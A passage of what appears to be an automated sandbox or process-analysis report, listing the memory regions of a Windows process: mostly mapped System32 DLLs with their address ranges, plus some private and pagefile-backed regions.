"c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 23207 start_va = 0x6f5c0000 end_va = 0x6f5f1fff entry_point = 0x6f5c0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 23208 start_va = 0x6f600000 end_va = 0x6f632fff entry_point = 0x6f600000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 23209 start_va = 0x6f640000 end_va = 0x6f6bcfff entry_point = 0x6f640000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 23210 start_va = 0x6f770000 end_va = 0x6f7bdfff entry_point = 0x6f770000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 23211 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 23212 start_va = 0x6f820000 end_va = 0x6f84afff entry_point = 0x6f820000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 23213 start_va = 0x6f900000 end_va = 0x6f90bfff entry_point = 0x6f900000 region_type = mapped_file name = "mspatcha.dll" filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll") Region: id = 23214 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 23215 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 23216 start_va = 0x70200000 end_va = 0x70250fff entry_point = 0x70200000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 23217 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 23218 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 23219 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 23220 start_va = 0x70500000 end_va = 0x70507fff entry_point = 0x70500000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 23221 start_va = 0x71e70000 end_va = 0x71e7efff entry_point = 0x71e70000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 23222 start_va = 0x72450000 end_va = 0x7247ffff entry_point = 0x72450000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 23223 start_va = 0x72480000 end_va = 0x72496fff entry_point = 0x72480000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 23224 start_va = 0x725e0000 end_va = 0x725ecfff entry_point = 0x725e0000 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 23225 start_va = 0x72670000 end_va = 0x72698fff entry_point = 0x72670000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 23226 start_va = 0x73260000 end_va = 0x732acfff entry_point = 0x73260000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 23227 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 23228 start_va = 0x73460000 end_va = 0x734b5fff entry_point = 0x73460000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 23229 start_va = 0x734c0000 end_va = 0x734c8fff entry_point = 0x734c0000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 23230 start_va = 0x734d0000 end_va = 0x73589fff entry_point = 0x734d0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 23231 start_va = 0x73590000 end_va = 0x7359afff entry_point = 0x73590000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 23232 start_va = 0x735a0000 end_va = 0x735a7fff entry_point = 0x735a0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 23233 start_va = 0x735b0000 end_va = 0x735b6fff entry_point = 0x735b0000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 23234 start_va = 0x735c0000 end_va = 0x73602fff entry_point = 0x735c0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 23235 start_va = 0x73610000 end_va = 0x73661fff entry_point = 0x73610000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 23236 start_va = 0x73670000 end_va = 0x73681fff entry_point = 0x73670000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 23237 start_va = 0x73690000 end_va = 0x7369cfff entry_point = 0x73690000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 23238 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 23239 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 23240 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 23241 start_va = 0x73810000 end_va = 0x7381efff entry_point = 0x73810000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 23242 start_va = 0x73820000 end_va = 0x73866fff entry_point = 0x73820000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 23243 start_va = 0x73870000 end_va = 0x73879fff entry_point = 0x73870000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 23244 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 23245 start_va = 0x73890000 end_va = 0x7389bfff entry_point = 0x73890000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 23246 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 23247 start_va = 0x738c0000 end_va = 0x738eafff entry_point = 0x738c0000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 23248 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 23249 start_va = 0x73900000 end_va = 0x73992fff entry_point = 0x73900000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 23250 start_va = 0x73b20000 end_va = 0x73b31fff entry_point = 0x73b20000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 23251 start_va = 0x73b40000 end_va = 0x73b46fff entry_point = 0x73b40000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 23252 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 23253 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 23254 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 23255 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 23256 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 23257 start_va = 0x73cd0000 end_va = 0x73d50fff entry_point = 0x73cd0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 23258 start_va = 0x73d60000 end_va = 0x73d6cfff entry_point = 0x73d60000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 23259 start_va = 0x73d70000 end_va = 0x73d7efff entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 23260 start_va = 0x73e80000 end_va = 0x73eaefff entry_point = 0x73e80000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 23261 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 23262 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 23263 start_va = 0x74320000 end_va = 0x74331fff entry_point = 0x74320000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 23264 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 23265 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 23266 start_va = 0x748e0000 end_va = 0x74955fff entry_point = 0x748e0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 23267 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 23268 start_va = 0x749e0000 end_va = 0x749eafff entry_point = 0x749e0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 23269 start_va = 0x74a10000 end_va = 0x74a25fff entry_point = 0x74a10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 23270 start_va = 0x74a30000 end_va = 0x74a46fff entry_point = 0x74a30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 23271 start_va = 0x74a50000 end_va = 0x74a64fff entry_point = 0x74a50000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 23272 start_va = 0x74af0000 end_va = 0x74b1bfff entry_point = 0x74af0000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 23273 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 23274 start_va = 0x74bd0000 end_va = 0x74bddfff entry_point = 0x74bd0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 23275 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 23276 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 23277 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 23278 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 23279 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 23280 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 23281 start_va = 0x74f20000 end_va = 0x74f4afff entry_point = 0x74f20000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 23282 start_va = 0x74f60000 end_va = 0x74f65fff entry_point = 0x74f60000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 23283 start_va = 0x74f70000 end_va = 0x74f76fff entry_point = 0x74f70000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 23284 start_va = 0x74fe0000 end_va = 0x74ffafff entry_point = 0x74fe0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 23285 start_va = 0x75010000 end_va = 0x75051fff entry_point = 0x75010000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 23286 start_va = 0x75060000 end_va = 0x75070fff entry_point = 0x75060000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 23287 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 23288 start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 23289 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 23290 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 23291 start_va = 0x752e0000 end_va = 0x7533efff entry_point = 0x752e0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 23292 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 23293 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 23294 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 23295 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 23296 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 23297 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 23298 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23299 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 23300 start_va = 0x75650000 end_va = 0x7567cfff entry_point = 0x75650000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 23301 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 23302 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 23303 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 23304 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 23305 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 23306 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 23307 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23308 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23309 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 23310 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 23311 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23312 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 23313 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23314 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23315 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 23316 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23317 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23318 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 23319 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23320 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 23321 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 23322 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23323 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23324 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23325 start_va = 0x7ff84000 end_va = 0x7ff84fff entry_point = 0x0 region_type = private name = "private_0x000000007ff84000" filename = "" Region: id = 23326 start_va = 0x7ff85000 end_va = 0x7ff85fff entry_point = 0x0 region_type = private name = "private_0x000000007ff85000" filename = "" Region: id = 23327 start_va = 0x7ff86000 end_va = 0x7ff86fff entry_point = 0x0 region_type = private name = "private_0x000000007ff86000" filename = "" Region: id = 23328 start_va = 0x7ff8a000 end_va = 0x7ff8afff entry_point = 0x0 region_type = private name = "private_0x000000007ff8a000" filename = "" Region: id = 23329 start_va = 0x7ff8b000 end_va = 0x7ff8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff8b000" filename = "" Region: id = 23330 start_va = 0x7ff96000 end_va = 0x7ff96fff entry_point = 0x0 region_type = private name = "private_0x000000007ff96000" filename = "" Region: id = 23331 start_va = 0x7ff99000 end_va = 0x7ff99fff entry_point = 0x0 region_type = private name = "private_0x000000007ff99000" filename = "" Region: id = 23332 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 23333 start_va = 0x7ff9d000 end_va = 0x7ff9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9d000" filename = "" Region: id = 23334 start_va = 0x7ff9e000 end_va = 0x7ff9efff entry_point = 0x0 region_type = private name = "private_0x000000007ff9e000" filename = "" Region: id = 23335 start_va = 0x7ffa0000 end_va = 0x7ffa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa0000" filename = "" Region: id = 23336 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 23337 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 23338 start_va = 0x7ffa5000 end_va = 0x7ffa5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa5000" filename = "" Region: id = 23339 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 23340 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 23341 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 23342 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 